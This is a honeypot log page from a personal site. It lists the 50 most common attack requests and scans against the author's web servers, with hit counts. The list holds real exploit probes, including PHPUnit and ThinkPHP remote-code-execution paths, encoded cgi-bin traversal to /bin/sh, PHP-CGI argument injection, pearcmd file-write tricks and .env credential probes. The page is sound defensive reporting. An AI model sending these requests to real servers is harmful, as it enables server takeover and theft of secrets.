jacks-reid.xyz

Web Honeypot

Attackers are constantly spewing attacks against everything on the internet. Not everyone does this quietly.

Below is a list of the top 50 most common attacks or scans against my web servers from the past seven days, updated daily. IPs and domains seen in the list are filtered. A byproduct of filtering domains is that file extensions can get regexed as DNS hosts, so use your imagination for anything that looks odd.

UPDATE: After running daily updates for over a year, I am shutting down the service. This list will remain static with the last logs posted.

HTTP Request URINumber of Hits
/cgi-bin/luci/;stok=/locale52
/cdn-cgi/trace51
/FILE_OR_DOMAIN42
\x84\xB4,\x85\xAFn\xE3Y\xBBbhl\xFF(=':\xA9\x82\xD9o\xC8\xA2\xD7\x93\x98\xB4\xEF\x80\xE5\xB9\x90\x00(\xC033
/FILE_OR_DOMAIN30
*23
/.env13
/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN13
/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh10
/test/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/admin/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/containers/json9
/yii/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/lib/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/lib/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/backup/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/crm/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/www/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/panel/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/lib/phpunit/Util/PHP/FILE_OR_DOMAIN9
/public/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/phpunit/phpunit/Util/PHP/FILE_OR_DOMAIN9
/V2/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/cms/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/zend/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/FILE_OR_DOMAIN?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello9
/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh9
/phpunit/Util/PHP/FILE_OR_DOMAIN9
/FILE_OR_DOMAIN?lang=../../../../../../../../tmp/index19
/testing/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/vendor/phpunit/phpunit/Util/PHP/FILE_OR_DOMAIN9
/lib/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/FILE_OR_DOMAIN?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input9
/vendor/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/demo/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/FILE_OR_DOMAIN?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/FILE_OR_DOMAIN9
/api/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/apps/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/blog/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/vendor/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/public/FILE_OR_DOMAIN?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello9
/app/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/lib/phpunit/phpunit/Util/PHP/FILE_OR_DOMAIN9
/vendor/phpunit/phpunit/LICENSE/FILE_OR_DOMAIN9
/ws/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9
/laravel/vendor/phpunit/phpunit/src/Util/PHP/FILE_OR_DOMAIN9